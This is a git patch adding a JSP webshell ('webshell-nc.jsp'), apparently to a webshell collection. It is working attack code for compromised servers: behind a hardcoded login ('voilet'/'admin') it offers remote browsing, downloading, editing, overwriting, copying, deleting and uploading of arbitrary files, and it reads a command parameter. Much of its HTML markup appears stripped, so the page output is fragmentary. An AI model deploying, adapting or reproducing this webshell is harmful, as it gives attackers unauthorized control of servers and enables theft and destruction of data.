From 6cc748ad93e7cc68305d5933aae098ec07036fdd Mon Sep 17 00:00:00 2001 From: tennc Date: Tue, 29 Oct 2013 17:40:59 +0800 Subject: [PATCH] update webshell -nc jsp shell webshell-nc js webshell --- jsp/webshell-nc.jsp | 1321 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1321 insertions(+) create mode 100644 jsp/webshell-nc.jsp diff --git a/jsp/webshell-nc.jsp b/jsp/webshell-nc.jsp new file mode 100644 index 0000000..9fc8117 --- /dev/null +++ b/jsp/webshell-nc.jsp @@ -0,0 +1,1321 @@ + +<% + /** + websell V1.1 windows platform + @Filename: voilet.jsp + @Description: 苦咖啡修改个人专用版。 + @Author: stlouisy + @Email: voilet119@163.com + */ +%> +<%@page contentType="text/html;charset=utf-8"%> +<%@page import="java.io.*,java.util.*,java.net.*"%> +<% + session.setMaxInactiveInterval(6000); + final String URL = request.getRequestURI(); + final String isLogout = request.getParameter("isExit"); + System.out.println(isLogout); + if("isExit".equals(isLogout)){ + session.removeAttribute("LName"); + out + .println("


" + + "

" + + "
用户名:
" + + "密 码:
"); + return; + } + if (session.getAttribute("ID") == null) { + // the user and pass field + String username = "voilet"; + String password = "admin"; + // the user and pass field + if (request.getParameter("LName") != null + && request.getParameter("LPass") != null + && request.getParameter("LName").equals(username) + && request.getParameter("LPass").equals(password)) { + session.setAttribute("ID", "1"); + response.sendRedirect(URL); + } else { + out + .println("


" + + "

" + + "
username:
" + + "password:
"); + + } + return; + } +%> +<%!private final static int languageNo = 0; //Language,0 : Chinese; 1:English + + String strThisFile = ""; + + String strSeparator = File.separator; + + String[] authorInfo = {" 苦咖啡修改版", + " "}; + + String[] strFileManage = {"文 件 管 理", "File Management"}; + + String[] strCommand = {"CMD 命 令", "Command Window"}; + + String[] strSysProperty = {"系 统 属 性", "System Property"}; + String[] strSysExit = {"退出","System Exit"}; + + String[] strHelp = {"帮 助", "Help"}; + + String[] strParentFolder = {"上级目录", "Parent Folder"}; + + String[] strCurrentFolder = {"当前目录", "Current Folder"}; + + String[] strDrivers = {"驱动器", "Drivers"}; + + String[] strFileName = {"文件名称", "File Name"}; + + String[] strFileSize = {"文件大小", "File Size"}; + + String[] strLastModified = {"最后修改", "Last Modified"}; + + String[] strFileOperation = {"文件操作", "Operations"}; + + String[] strFileEdit = {"修改", "Edit"}; + + String[] strFileDown = {"下载", "Download"}; + + String[] strFileCopy = {"复制", "Move"}; + + String[] strFileDel = {"删除", "Delete"}; + + String[] strExecute = {"执行", "Execute"}; + + String[] strBack = {"返回", "Back"}; + + String[] strFileSave = {"保存", "Save"}; + + public class FileHandler { + + private String strAction = ""; + + private String strFile = ""; + + void FileHandler(String action, String f) { + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + public class UplInfo { + + public long totalSize; + + public long currSize; + + public long starttime; + + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } else + return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) + return 0; + else + return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0) { + if (time % 60 >= 10) + return time / 60 + ":" + (time % 60) + "m"; + else + return time / 60 + ":0" + (time % 60) + "m"; + } else + return time < 10 ? "0" + time + "s" : time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) + return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0) { + if (time % 60 >= 10) + return time / 60 + ":" + (time % 60) + "m"; + else + return time / 60 + ":0" + (time % 60) + "m"; + } else + return time < 10 ? "0" + time + "s" : time + "s"; + } + } + + public class FileInfo { + + public String name = null, clientFileName = null, + fileContentType = null; + + private byte[] fileContents = null; + + public File file = null; + + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + private final String lineSeparator = System.getProperty( + "line.separator", "\n"); + + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, + String saveInDir, int clength) throws IllegalArgumentException, + IOException { + if (is == null) + throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) + throw new IllegalArgumentException("\"" + boundary + + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) + throw new IOException("Boundary not found; boundary = " + + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) + return dataTable; + line = getLine(is); + if (line == null) + return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) + throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) + throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) + throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase( + "filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) + return dataTable; + if (line.trim().length() < 1) + skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) + throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) + return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) + return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) + saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) + os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else + os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, + previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, + currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } else + fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + byte b; + if (boundary == null || ba == null) + return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) + return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) + throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) + line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) + throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) + throw new IllegalArgumentException("dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) + name = fileName.substring(index + 1); + else + name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) + fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') + return path.replace('\\', File.separatorChar); + else + return path.replace('/', File.separatorChar); + } + } //End of class HttpMultiPartParser + + String formatPath(String p) { + StringBuffer sb = new StringBuffer(); + for (int i = 0; i < p.length(); i++) { + if (p.charAt(i) == '\\') { + sb.append("\\\\"); + } else { + sb.append(p.charAt(i)); + } + } + return sb.toString(); + } + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') + return "&"; + else if (i == '<') + return "<"; + else if (i == '>') + return ">"; + else if (i == '"') + return """; + else + return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String htmlEncode(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } + + String getDrivers() + /** + Windows系统上取得可用的所有逻辑盘 + */ + { + StringBuffer sb = new StringBuffer(strDrivers[languageNo] + ":"); + File roots[] = File.listRoots(); + for (int i = 0; i < roots.length; i++) { + sb.append(" "); + sb.append(roots[i] + " "); + } + return sb.toString(); + } + + static String convertFileSize(long filesize) { + String strUnit = "Bytes"; + String strAfterComma = ""; + int intDivisor = 1; + if (filesize >= 1024 * 1024) { + strUnit = "MB"; + intDivisor = 1024 * 1024; + } else if (filesize >= 1024) { + strUnit = "KB"; + intDivisor = 1024; + } + if (intDivisor == 1) + return filesize + " " + strUnit; + strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor; + if (strAfterComma == "") + strAfterComma = ".0"; + return filesize / intDivisor + "." + strAfterComma + " " + strUnit; + }%> +<% + request.setCharacterEncoding("gb2312"); + String tabID = request.getParameter("tabID"); + String strDir = request.getParameter("path"); + String strAction = request.getParameter("action"); + String strFile = request.getParameter("file"); + String strPath = strDir + strSeparator + strFile; + String strCmd = request.getParameter("cmd"); + StringBuffer sbEdit = new StringBuffer(""); + StringBuffer sbDown = new StringBuffer(""); + StringBuffer sbCopy = new StringBuffer(""); + StringBuffer sbSaveCopy = new StringBuffer(""); + StringBuffer sbNewFile = new StringBuffer(""); + String strOS = System.getProperty("os.name").toLowerCase(); + //out.print(strPath); + if ((tabID == null) || tabID.equals("")) { + tabID = "1"; + } + if (strDir == null || strDir.length() < 1) { + strDir = request.getRealPath("/"); + } + if (strAction != null && strAction.equals("down")) { + File downloadfile = new File(strPath); + response.setContentType("APPLICATION/OCTET-STREAM"); + response.setHeader("Content-Disposition", + "attachment;filename=\"" + + strPath.substring( + strPath.lastIndexOf("\\") + 1, strPath + .length()) + "\""); + FileInputStream fileInputStream = new FileInputStream( + downloadfile); + int totalRead = 0; + int readBytes = 0; + long fileLen = downloadfile.length(); + byte b[] = new byte[65000]; + response.resetBuffer(); + while ((long) totalRead < fileLen) { + readBytes = fileInputStream.read(b); + totalRead += readBytes; + response.getOutputStream().write(b, 0, readBytes); + } + fileInputStream.close(); + out.clear(); + out = pageContext.pushBody(); + } + if (strAction != null && strAction.equals("del")) { + File f = new File(strPath); + f.delete(); + } + if (strAction != null && strAction.equals("edit")) { + String ext = strPath.substring(strPath.lastIndexOf(".") + 1, + strPath.length()); + if (ext.equalsIgnoreCase("txt") || ext.equalsIgnoreCase("sql") + || ext.equalsIgnoreCase("css") + || ext.equalsIgnoreCase("xml") + || ext.equalsIgnoreCase("tld") + || ext.equalsIgnoreCase("cfg") + || ext.equalsIgnoreCase("jsp") + || ext.equalsIgnoreCase("htm") + || ext.equalsIgnoreCase("properties") + || ext.equalsIgnoreCase("html") + || ext.equalsIgnoreCase("htm") + || ext.equalsIgnoreCase("js") + || ext.equalsIgnoreCase("ini") + || ext.equalsIgnoreCase("java")) { + File f = new File(strPath); + BufferedReader br = new BufferedReader( + new InputStreamReader(new FileInputStream(f))); + sbEdit + .append("
\r\n"); + sbEdit + .append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append(" "); + sbEdit.append("  " + + strPath + "\r\n"); + sbEdit + .append("
"); + sbEdit.append(""); + sbEdit.append("
"); + } else { + sbEdit.append("文件无法打开:
"); + sbEdit.append(strPath + "
"); + } + } + if (strAction != null && strAction.equals("save")) { + File f = new File(strPath); + BufferedWriter bw = new BufferedWriter(new OutputStreamWriter( + new FileOutputStream(f))); + String strContent = request.getParameter("content"); + bw.write(strContent); + bw.close(); + } + if (strAction != null && strAction.equals("copy")) { + File f = new File(strPath); + sbCopy + .append("
\r\n"); + sbCopy + .append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("原始文件: " + strPath + "

"); + sbCopy + .append("目标文件:

"); + sbCopy.append(" "); + sbCopy.append("

 \r\n"); + sbCopy.append("

"); + } + if (strAction != null && strAction.equals("savecopy")) { + File f = new File(strPath); + String strDesFile = request.getParameter("file2"); + if (strDesFile == null || strDesFile.equals("")) { + sbSaveCopy.append("

目标文件错误。"); + } else { + File f_des = new File(strDesFile); + if (f_des.isFile()) { + sbSaveCopy + .append("

目标文件已存在,不能复制。"); + } else { + String strTmpFile = strDesFile; + if (f_des.isDirectory()) { + if (!strDesFile.endsWith(strSeparator)) { + strDesFile = strDesFile + strSeparator; + } + strTmpFile = strDesFile + "copy of " + strFile; + } + File f_des_copy = new File(strTmpFile); + FileInputStream in1 = new FileInputStream(f); + FileOutputStream out1 = new FileOutputStream(f_des_copy); + byte[] buffer = new byte[1024]; + int c; + while ((c = in1.read(buffer)) != -1) { + out1.write(buffer, 0, c); + } + in1.close(); + out1.close(); + sbSaveCopy.append("原始文件 :" + strPath + "

"); + sbSaveCopy.append("目标文件 :" + strTmpFile + "

"); + sbSaveCopy.append("复制成功!"); + } + } + sbSaveCopy + .append("

"); + } + if (strAction != null && strAction.equals("newFile")) { + String strF = request.getParameter("fileName"); + if (!(strF == null || strF.equals(""))) { + File f_new = new File(strF); + if (!f_new.mkdirs()) + sbNewFile.append(strF + " 目录创建失败"); + } else { + sbNewFile.append("

请输入完整路径及文件夹名称"); + } + } + if ((request.getContentType() != null) + && (request.getContentType().toLowerCase() + .startsWith("multipart"))) { + String tempdir = "."; + boolean error = false; + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser.processData(request.getInputStream(), + bound, tempdir, clength); + if (ht.get("cqqUploadFile") != null) { + FileInfo fi = (FileInfo) ht.get("cqqUploadFile"); + File f1 = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f1.delete(); + request.setAttribute("error", "Upload aborted"); + } else { + String path = (String) ht.get("path"); + if (path != null && !path.endsWith(strSeparator)) + path = path + strSeparator; + strDir = path; + //out.println(path + f1.getName()); + if (!f1.renameTo(new File(path + f1.getName()))) { + request + .setAttribute("error", + "Cannot upload file."); + out.println("error,upload "); + error = true; + f1.delete(); + } + } + } + } +%> + + + + + + + + 苦咖啡专用 + + + + + +

+ + + + + + +
+ + + + + + + <% + StringBuffer sbFolder = new StringBuffer(""); + StringBuffer sbFile = new StringBuffer(""); + int filenum = 0; + String filelen = ""; + long filelong = 0; + try { + File objFile = new File(strDir); + File list[] = objFile.listFiles(); + if (objFile.getAbsolutePath().length() > 3) { + sbFolder + .append(" "); + sbFolder.append(strParentFolder[languageNo] + + "
- - - - - - - - - - - \r\n "); + } + for (int i = 0; i < list.length; i++) { + if (list[i].isDirectory()) { + sbFolder.append(" "); + sbFolder.append(" "); + sbFolder.append(list[i].getName() + + "
"); + } else { + filenum++; + String strLen = ""; + String strDT = ""; + long lFile = 0; + lFile = list[i].length(); + filelong += lFile; + strLen = convertFileSize(lFile); + Date dt = new Date(list[i].lastModified()); + strDT = dt.toLocaleString(); + sbFile + .append(""); + sbFile.append("" + list[i].getName()); + sbFile.append(""); + sbFile.append("" + strLen); + sbFile.append(""); + sbFile.append("" + strDT); + sbFile.append(""); + sbFile.append(" "); + sbFile.append(strFileEdit[languageNo] + " "); + sbFile.append(" "); + sbFile.append(strFileDel[languageNo] + " "); + sbFile.append(" "); + sbFile.append(strFileDown[languageNo] + " "); + sbFile.append(" "); + sbFile.append(strFileCopy[languageNo] + " "); + } + } + if (filelong > 1000000) { + filelong = filelong / 1000000; + filelen = "" + filelong + " M"; + } else if (filelong > 1000) { + filelong = filelong / 1000; + filelen = "" + filelong + " K"; + } else { + filelen = "" + filelong + + " Byte"; + } + } catch (Exception e) { + out + .println("操作失败: " + e.toString() + + ""); + } + %> + +
+ + + + + + + +
+ + +
+
+
+ +
+ +
\ No newline at end of file